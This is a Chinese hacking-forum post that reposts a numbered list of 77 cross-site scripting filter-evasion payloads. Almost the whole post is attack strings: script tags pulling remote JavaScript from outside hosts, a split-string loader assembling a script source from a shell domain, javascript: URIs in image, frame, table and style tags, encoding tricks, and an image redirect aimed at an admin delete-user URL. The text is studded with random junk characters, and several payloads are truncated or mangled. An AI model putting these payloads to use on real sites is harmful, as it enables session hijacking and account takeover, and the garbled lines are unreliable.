貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
9 L# t- \" Z* v! m% ]; O
! h7 x2 d J+ h5 F- i (1)普通的XSS JavaScript注入$ E; a" W+ o3 N4 p. u! t% N* M
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
6 i: m. i) y. s+ P& x5 b) r9 f' z3 I" P+ s
(2)IMG标签XSS使用JavaScript命令
# m7 L$ `: G6 S( ]' X <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>/ i; ^$ E; }. Q7 H7 E+ x6 |
3 _9 o* a( z0 |" [6 O (3)IMG标签无分号无引号
t4 J: B n+ W( V) i2 Q$ B <IMG SRC=javascript:alert(‘XSS’)>
7 {, B" [2 ]+ X' Z1 B! C& r% \, g6 b; |* {9 T0 z+ f
(4)IMG标签大小写不敏感
1 o$ a- z' O# I( ]- W# s l0 N <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
, } P: p+ R( z& k' r% r) ?- @: Z9 Y' v
(5)HTML编码(必须有分号)
- W- M. @ C& b% Y+ w, n$ U8 M( o <IMG SRC=javascript:alert(“XSS”)>' g+ b3 [' {* K& A, f. V# ^) @
/ n" V- P6 L- M5 \* n* Y7 ] (6)修正缺陷IMG标签
: u4 n: H' l- q7 u <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
- S6 `2 @8 ]) S4 e6 L( Q+ \3 u) w2 j4 A' I, P5 k
(7)formCharCode标签(计算器), Z; u" P/ |2 M" U
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>6 U. o i" V3 L$ T/ B" A' J/ x
% A3 i; e6 n( P5 q1 e. T (8)UTF-8的Unicode编码(计算器)- H7 E' B N$ n# }
<IMG SRC=jav..省略..S')>! C+ v3 r) h! J; A% Q3 ]
, _. o5 Z& X r" _2 c$ u; f
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
, g0 \3 a$ `4 t. u$ ? <IMG SRC=jav..省略..S')>7 D1 c j8 ]' X {
: ^: J# B: X5 d* s% r9 ] (10)十六进制编码也是没有分号(计算器)* M& m. s/ N, ^2 O% f
<IMG SRC=java..省略..XSS')>
; D. R$ _$ D( ^! f9 A0 W9 i
) W' Z( F8 m. B( e& a, j (11)嵌入式标签,将Javascript分开/ H* z& D- N. l' j2 i, m) ?
<IMG SRC=”jav ascript:alert(‘XSS’);”>
1 {& e+ v7 i9 a) ?+ B- I
/ L* M- E6 U/ H2 l/ V (12)嵌入式编码标签,将Javascript分开
7 B( G9 m6 O; k# w* I5 a <IMG SRC=”jav ascript:alert(‘XSS’);”>7 T7 L7 l5 p4 F' W' [: S
( D- J H$ m. {8 d3 c (13)嵌入式换行符
S8 }# A* ]4 s+ l9 h: G <IMG SRC=”jav ascript:alert(‘XSS’);”># S5 _+ w9 K+ c! n
b+ x, [9 J+ m! Q* @+ v8 X1 y; Y (14)嵌入式回车 S6 x3 C: c7 K/ B8 f
<IMG SRC=”jav ascript:alert(‘XSS’);”> r/ F ?/ x. `7 b
6 y% C3 a7 b/ [: r6 I. t4 ? (15)嵌入式多行注入JavaScript,这是XSS极端的例子
. [& A% b9 G5 i4 { <IMG SRC=”javascript:alert(‘XSS‘)”>& b9 |- J; V- x+ v: i
2 X: Z+ w3 V; ?# z8 R
(16)解决限制字符(要求同页面)
, n% a# h$ v! ^' K* c g' [# @) J* _ <script>z=’document.’</script>& C' a6 a9 s& F0 i3 o& |2 m
<script>z=z+’write(“‘</script># S0 N; A( N* b' r& Y# K9 n7 Q- _
<script>z=z+’<script’</script>
$ j" m( k4 ]" D4 D <script>z=z+’ src=ht’</script>$ B8 U/ z0 Q9 Y3 O2 \
<script>z=z+’tp://ww’</script>0 }# W: z; c0 `4 e& U( [- ~0 }
<script>z=z+’w.shell’</script>
2 O1 D3 k; I5 F) B( S <script>z=z+’.net/1.’</script>- s5 W( ?' y. V+ q4 X. s
<script>z=z+’js></sc’</script>/ q& w8 q& ?1 i7 S7 b: a) @
<script>z=z+’ript>”)’</script>
( n+ s) ~8 ]1 o+ g: n <script>eval_r(z)</script>) Q7 x9 p2 ~ I$ p( ^; x, v
) l+ X/ @+ k/ f3 f2 j( l, W* _ (17)空字符
% F' G# T) w3 G perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
! D, p6 J8 A2 z5 s7 w5 N- Y% t* j% g8 _, R, B2 a5 ~! `# p/ U
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
7 O3 h6 E" |+ B8 T' x perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out: t- M0 p, `+ E- L5 X8 u! n
9 y3 R3 k" E5 f+ {3 [ l- u9 D
(19)Spaces和meta前的IMG标签
, `' A, i9 y' D, p/ o7 b <IMG SRC=” � javascript:alert(‘XSS’);”>4 N3 |0 ^3 n) z- p0 m" Y% f1 Z E) Z7 Z
3 H# O( O9 \$ k
(20)Non-alpha-non-digit XSS7 H: s% F, l! [) l3 T4 d' B
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>! V8 [0 H: _, \' J, @% _4 H
. n; K. p8 n: L0 j J6 t (21)Non-alpha-non-digit XSS to 2" R$ q9 m- P+ K
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>* u/ j0 n8 Q! M/ B: j
' w9 \5 s6 s( H. Y8 d# V; P: Q7 i (22)Non-alpha-non-digit XSS to 36 g8 s4 v2 M7 m9 \
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
% C% m4 y9 N# c" t4 g. o$ K
* @1 r) j) @5 J. z" B+ h5 ? (23)双开括号
2 V( C# e; s/ C9 Q$ f <<SCRIPT>alert(“XSS”);//<</SCRIPT>
3 H! _; ?& |2 |$ Q6 {6 C- }8 Y4 B- |' o5 |
(24)无结束脚本标记(仅火狐等浏览器)9 i' c* F' H% m% ]& m. S/ t
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
- E7 `6 K* e+ k" ]! W4 O, X5 T! L6 n0 s* p& p/ V
(25)无结束脚本标记2
( z8 \% G2 m+ h- o <SCRIPT SRC=//3w.org/XSS/xss.js>
# @: ?" z% ]6 A+ {6 v5 X( `
0 J4 k @' \0 J; a+ S j (26)半开的HTML/JavaScript XSS7 E) D$ W: q m5 h6 _
<IMG SRC=”javascript:alert(‘XSS’)”
2 v/ }; f# p0 b4 Q6 z7 | R9 S* Z1 D( X0 H1 @) t |% ~
(27)双开角括号
. ~) U) K. a+ F8 `' F; ` <iframe src=http://3w.org/XSS.html <
/ n# I2 L. @: e+ {; D {9 a% [% o, u( w0 V- X9 F
(28)无单引号 双引号 分号
3 H, u7 _4 J5 r! c <SCRIPT>a=/XSS/
% |+ b1 d' u3 O; ]; S alert(a.source)</SCRIPT>
$ _1 A6 B S- |& j
1 h2 T& e/ W+ o3 @+ p$ R6 i, l (29)换码过滤的JavaScript
$ H$ y2 ~; ~* A; B8 @4 @ \”;alert(‘XSS’);//
1 U/ f* r6 _! s0 M3 E: d. D' ?( u) }- T2 |
(30)结束Title标签
0 b" k/ x- X8 Q1 }) j1 f% `0 y </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>' D+ I$ t2 O8 e
% [( q& [+ D+ t: }- T; B
(31)Input Image
* C3 m; w7 C+ G <INPUT SRC=”javascript:alert(‘XSS’);”>/ X( B' o0 u+ s/ x- N. O
% X; ?1 a' q. S
(32)BODY Image) r) z, R( O/ K, |. M( p
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>7 A& a: R1 m& N3 g; L
" b/ }0 V/ X) m: r
(33)BODY标签, ~5 i; k+ k" Q
<BODY(‘XSS’)>
- M4 {; i, a; w/ J6 [+ C4 g+ R5 z1 b8 Z T! ^5 [
(34)IMG Dynsrc: w9 F* M* B3 S
<IMG DYNSRC=”javascript:alert(‘XSS’)”>& L- Y2 _- \) z' d: R$ i: X1 Z1 ~
0 j9 X( u: e7 f1 Y) e (35)IMG Lowsrc
1 E. Z& S2 C: O( E, p' | <IMG LOWSRC=”javascript:alert(‘XSS’)”>2 j5 x7 [% v. R
; f6 p) W0 K; h7 U' a! h
(36)BGSOUND
5 p8 s8 ]$ H. l <BGSOUND SRC=”javascript:alert(‘XSS’);”>4 v ?! ~7 O4 G* f0 N" j. g; O
' E0 m% m6 v0 E( z (37)STYLE sheet7 d$ O) m- L$ O3 C8 H
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
$ k: u5 K, c- p9 ^' B
; g* w1 f5 u* f: ~ (38)远程样式表
. u+ ~% C( U0 a( ], P+ \2 ? <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
; j6 ?2 S4 [! m# G+ D! w1 P& P* E% H1 A
(39)List-style-image(列表式): ?4 |0 ]7 g# z5 T% g+ e2 g
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
9 g: f8 n$ u' p- @: @! O% L0 \, C. x! t$ D/ q* }! p
(40)IMG VBscript$ C+ ?4 @. c" V1 K% p' E; l2 K$ h
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
$ Q3 U* b3 l, [6 G& ~# b/ c5 o" b5 E! |
(41)META链接url
& ^' K3 B0 |" a( |4 r) z <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
( M$ p. k1 v) Y% }
( A f, x8 ~1 }4 O5 g' P (42)Iframe
: C! T4 s& ?! w7 ^* v- B2 r <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>$ L5 F( K; ?9 d8 j' q- w
" p5 p* { ?0 X$ [( F+ f( z
(43)Frame1 y! H) w- w: }: F0 R& v" W
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>) t9 f% k7 k$ Q" u
; H! }) D" @8 g6 G (44)Table
* c8 ^2 Y1 ^% k3 V9 S <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>0 h0 i" T' u2 j4 o% G" V
7 }/ n2 Z- K+ x# M; P% g. Q3 | b
(45)TD4 M, F1 I1 J; p4 i' T
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
1 V, K1 r, {+ C$ m" E. s9 O) X+ B" V
4 F+ H; \* O& I9 x- h6 ? ^3 H (46)DIV background-image
; H4 ~7 ?- ?3 K% ? <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>$ Y+ B8 W; X6 M$ ]' b5 p! e
* K. t0 b. g# h l
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
0 S3 n0 X# f3 A1 {% {; L1 ~0 w9 U <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
' c5 Q; W% K. e3 i
' g& J5 B" R) H' f3 |6 ^" D) u (48)DIV expression0 ^% h5 d) x+ r# z" t# \0 Q& F! s
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
$ E. K' c$ V5 c. Y
0 R; H2 \% ]9 w* k. j, X* D! M (49)STYLE属性分拆表达
0 ], d6 s3 \0 Q+ w0 Y <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
; v: e1 ^0 W5 @: A2 d) r' k% S, t+ T. ^/ L! o
(50)匿名STYLE(组成:开角号和一个字母开头)4 y0 r4 G6 P5 E) s0 R6 o5 s6 I: ~. @) Y
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
# s6 B' j3 M% z6 J( H$ n- S' o$ {, K
(51)STYLE background-image
' N! j8 @) p% @$ S <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>9 E5 {7 X6 z7 ?/ N" H
6 v5 f" [5 U `3 s3 ~
(52)IMG STYLE方式
; n, b3 o/ E( h/ w: Q exppression(alert(“XSS”))’>0 u, @0 R* v7 c& c0 b& R* u
4 J% h* d) e5 Y" A2 \ (53)STYLE background- G# x6 g8 Q5 c3 T: \; P
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>7 i8 x7 f9 F5 O6 u
3 B5 W7 e9 ~1 E7 p+ J3 w (54)BASE
) N4 _6 q+ g4 ~4 }! S/ J <BASE HREF=”javascript:alert(‘XSS’);//”>
0 K& |7 o( K/ y1 J+ v) G
( Q& ~. q9 L. P' {- B; c (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS: P8 s2 v/ Y, Q, o7 u
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>& h+ Z* N: P9 D X1 x! j$ Y
& G) L3 @/ o2 }$ i+ U (56)在flash中使用ActionScrpt可以混进你XSS的代码# i; i6 R8 L1 g1 `- v
a=”get”;5 w' a2 f: z$ P6 g+ J9 @" d
b=”URL(\”";* r. g: b) e+ A* D
c=”javascript:”;" U; Y5 }4 q& Y) c: }$ @
d=”alert(‘XSS’);\”)”;7 G; P/ [/ i+ ]" z) G9 Q/ M. H% n
eval_r(a+b+c+d);( c7 {, v! s+ Y! v2 V$ V
, p6 w: J+ |; i1 H. Q5 p (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
2 N+ @4 H, d7 w" i" [7 z- L o- P <HTML xmlns:xss>, A4 b3 V7 A: h( K2 t- u3 [
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
6 r# S9 |" i% @) N <xss:xss>XSS</xss:xss>1 q* M: \# B5 A( u8 [
</HTML>
7 C s) W, p5 U3 [2 u; P! n
7 |( C! a' t9 J$ h: d3 E# w$ j (58)如果过滤了你的JS你可以在图片里添加JS代码来利用- V4 _2 A, g- |5 ~
<SCRIPT SRC=””></SCRIPT>% C+ w6 F7 Q7 g) ~. C
9 _$ R4 v7 [! ^- w8 y (59)IMG嵌入式命令,可执行任意命令: b5 m* m4 Z+ A9 j+ m# p
<IMG SRC=”http://www.XXX.com/a.php?a=b”>$ _& y8 R, M( S
2 x8 F% d% Q4 ^9 w) u5 D# l (60)IMG嵌入式命令(a.jpg在同服务器)
% f4 I; V$ }7 K- w7 A% M2 z Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
& t5 Z) x2 N, n" X* F& ?- ?0 c
0 p; p: j3 A& q* J6 m (61)绕符号过滤/ ?/ O. ]8 U8 g8 q1 T( @; B4 G
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>% Z9 g! w, n1 x, e# x1 q; N4 ^' Q
+ s% l, t% q% U, r1 V
(62)9 p7 }; Y% L8 T, M* X6 x( m/ m
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>+ ?. n! N1 u7 h6 C) ?$ N
7 B0 `* g1 S1 \1 ~/ D( B7 U (63)& T2 n$ j7 T1 T* x& l& k
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
" \* o4 I8 U$ L+ x0 i" L) m+ p& R; V, R8 C: v" G( G. {( m' K+ B
(64)
/ Q+ q6 x7 C a9 U$ ?, i) s9 x5 w <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>9 q4 W2 k+ Q3 x5 B/ N( ^% n
+ @8 {* }7 w! B# K4 b Z# j9 r9 u
(65)
) f% h0 z; C, i- w* g <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
/ `) |2 t" n* X+ j9 S; c
6 P/ |& Q3 U- H8 u7 a# ` (66)) k. a( v& @- p$ O# W9 S
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>' Z; d, T' k0 e. B
8 I4 O h' [% B' e. t) G
(67)
- M5 N; H Q- }& A4 I2 W! h3 E; n/ j <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT> M1 a B9 l8 d
3 f; F) W9 J& p6 J1 e9 Z (68)URL绕行
3 n. i; X5 e1 Q <A HREF=”http://127.0.0.1/”>XSS</A>
/ ]' I3 A5 \) ?: a2 R2 R
" C2 V/ M: `2 H5 Y( T# h9 { (69)URL编码
* k4 R5 ?0 I8 i# G7 d/ a <A HREF=”http://3w.org”>XSS</A>2 V/ j; ?0 j }2 h) r% {: B
( V# {% a/ Q- M* e3 S* P C (70)IP十进制
3 P i: [4 |$ k0 m% C <A HREF=”http://3232235521″>XSS</A>7 b' F/ [; ?: v* M- b6 i L
, z; [9 x" G" Z2 L( V' O
(71)IP十六进制
5 l8 `! x' ]0 ^" }9 U, A( @* \ <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>0 {' o6 v! k9 [
1 A, U" A3 |6 g3 [9 Q
(72)IP八进制
! R; L( s/ R2 v$ k! f <A HREF=”http://0300.0250.0000.0001″>XSS</A>
! B" i% s8 f/ s9 ~3 d- \* r; A
) q/ d" A' q/ n (73)混合编码
+ U' j- U; s. O3 r" e; Y <A HREF=”h
; C) z8 U' b" v4 x* _( o% t tt p://6 6.000146.0×7.147/”">XSS</A>4 l# J3 Y- U% ]9 R" z2 Y
; Q6 f. l' i% d! p, g" s
(74)节省[http:]( u( [0 ~6 G% W# s3 q3 E4 F
<A HREF=”//www.google.com/”>XSS</A>) ~" Q7 r- {6 ]
( ?- m5 l) d+ f& a (75)节省[www]
, `. n! J" w' x- S: n+ | <A HREF=”http://google.com/”>XSS</A>
9 {9 j1 I# N/ y+ x5 @: ^1 M: P8 f! s/ M+ s
(76)绝对点绝对DNS: e0 y h% @9 E: b# H# H
<A HREF=”http://www.google.com./”>XSS</A>+ y. A. A. N. Q
' ^/ P4 z. e5 b: q0 S
(77)javascript链接
' e1 A: {' n" B <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对